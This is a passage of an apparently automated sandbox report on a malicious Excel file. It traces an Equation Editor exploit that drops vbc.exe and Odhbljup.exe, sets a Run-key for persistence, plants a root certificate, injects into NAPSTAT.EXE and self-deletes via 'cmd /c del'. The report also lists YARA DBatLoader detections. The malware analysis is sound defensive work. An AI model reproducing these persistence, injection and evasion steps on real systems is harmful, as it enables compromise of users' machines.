              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 01FCE2A8 appears 58 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 01FCDF5C appears 124 times
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0203F970 appears 84 times
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00450FCC NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00436A08 NtdllDefWindowProc_A,GetCapture,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042BE54 NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_02128690 NtReadFile,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_021287C0 NtAllocateVirtualMemory,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_021285E0 NtCreateFile,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00450FCC NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00436A08 NtdllDefWindowProc_A,GetCapture,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0042BE54 NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00450FCC NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0044629C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00436A08 NtdllDefWindowProc_A,GetCapture,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0042BE54 NtdllDefWindowProc_A,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC00C4 NtCreateFile,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC07AC NtCreateMutant,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBF9F0 NtClose,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBF900 NtReadFile,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFBB8 NtQueryInformationToken,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFB68 NtFreeVirtualMemory,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFB50 NtCreateKey,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFAE8 NtQueryInformationProcess,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFAB8 NtQueryValueKey,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFDC0 NtQuerySystemInformation,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFD8C NtDelayExecution,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFC60 NtMapViewOfSection,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFFB4 NtCreateSection,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC01D4 NtSetValueKey,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC1148 NtOpenThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC010C NtOpenDirectoryObject,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC10D0 NtOpenProcessToken,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC0078 NtResumeThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC0060 NtQuerySection,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC0048 NtProtectVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBF938 NtWriteFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC1930 NtSetContextThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBF8CC NtWaitForSingleObject,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFBE8 NtQueryVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFA50 NtEnumerateValueKey,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFA20 NtQueryInformationFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC1D80 NtSuspendThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFD5C NtEnumerateKey,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFC90 NtUnmapViewOfSection,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFC48 NtSetInformationFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FC0C40 NtGetContextThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFC30 NtOpenProcess,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFFFC NtCreateProcessEx,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFF34 NtQueueApcThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFEA0 NtReadVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_01FBFE24 NtWriteVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_000985E0 NtCreateFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00098690 NtReadFile,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00098710 NtClose,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_000987C0 NtAllocateVirtualMemory,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396A82 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
              Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_00396F12 NtQueryInformationProcess,
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$7009.xlsxJump to behavior
              Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/33@8/2
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00423F40 GetLastError,FormatMessageA,
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Odhbljup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0041C8A8 FindResourceA,LoadResource,SizeofResource,LockResource,
              Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
              Source: 7009.xlsxVirustotal: Detection: 35%
              Source: 7009.xlsxReversingLabs: Detection: 40%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...................0.......................2.......................
              Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........@1........4.t...........0.......................&.......................
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\Odhbljup.exe "C:\Users\user\Odhbljup.exe"
              Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InProcServer32
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE55E.tmpJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00408B32 GetDiskFreeSpaceA,
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Odhbljup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
              Source: Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp

              Data Obfuscation:

              barindex
              Yara detected DBatLoaderShow sources
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1d02094.286.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d6d598.277.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d82094.284.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.31d598.276.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.332094.286.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.331ef4.277.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d6d594.281.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1ced598.277.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d6d598.275.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d81ef4.276.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.31d620.283.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.31d598.275.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1ced594.279.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1d01ef4.276.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1ced598.275.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.331ef4.278.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d6d620.283.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1ced594.281.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1ced620.283.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.331f44.281.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.vbc.exe.31d594.280.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.Odhbljup.exe.1d81f44.280.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.vbc.exe.31d734.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.3.Odhbljup.exe.1d01f44.280.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000003.480010544.0000000000320000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541642413.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.479622331.000000000031C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.479715174.000000000030C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.540973597.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566824102.0000000001CF0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.478861422.000000000030C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541230145.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566299990.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541187560.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541036876.0000000001D6C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566467574.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541516401.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.478734155.0000000000334000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.478780322.000000000030C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541395274.0000000001D70000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.478805681.000000000031C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.479654433.0000000000334000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.480122394.000000000030C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.565869963.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566017629.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566757773.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566404823.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541266508.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566183618.0000000001CEC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566603029.0000000001D04000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.478831765.0000000000330000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541317929.0000000001D5C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.559751606.000000000031C000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.540909993.0000000001D84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.567012932.0000000001CDC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.566928975.0000000001D00000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.480088573.0000000000330000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.541124265.0000000001D80000.00000004.00000001.sdmp, type: MEMORY
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0043DD6C push 0043DDF9h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00458108 push 00458140h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A1F4 push 0042A220h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00458180 push 004581ACh; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A1AC push 0042A1EAh; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0045A1B4 push 0045A427h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A22C push 0042A264h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042C294 push 0042C2D7h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00406340 push 00406391h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042C30C push 0042C338h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00428448 push 00428518h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A550 push 0042A57Ch; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040E5F8 push 0040E624h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00406588 push 004065B4h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00406600 push 0040662Ch; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00414628 push ecx; mov dword ptr [esp], eax
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00428628 push 00428654h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042A6FC push 0042A728h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00440764 push 00440790h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004547B8 push 004547F0h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004288FC push 00428928h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0045A958 push 0045A984h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042C918 push 0042C971h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004289F8 push 00428A24h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0041C9FF pushfd ; retf 0041h
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0045A990 push 0045A9B6h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042C9B4 push 0042C9ECh; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0042CA48 push 0042CA74h; ret
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00459820 LoadLibraryA,GetProcAddress,
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\Odhbljup.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\Odhbljup.exeJump to dropped file

              Boot Survival:

              barindex
              Drops PE files to the user root directoryShow sources
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\Odhbljup.exeJump to dropped file
              Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OdhbljupJump to behavior
              Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OdhbljupJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0043812C IsIconic,GetCapture,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_0043812C IsIconic,GetCapture,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 7_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_0043812C IsIconic,GetCapture,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
              Source: C:\Users\user\Odhbljup.exeCode function: 10_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
              Source: C:\Users\Public\vbc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
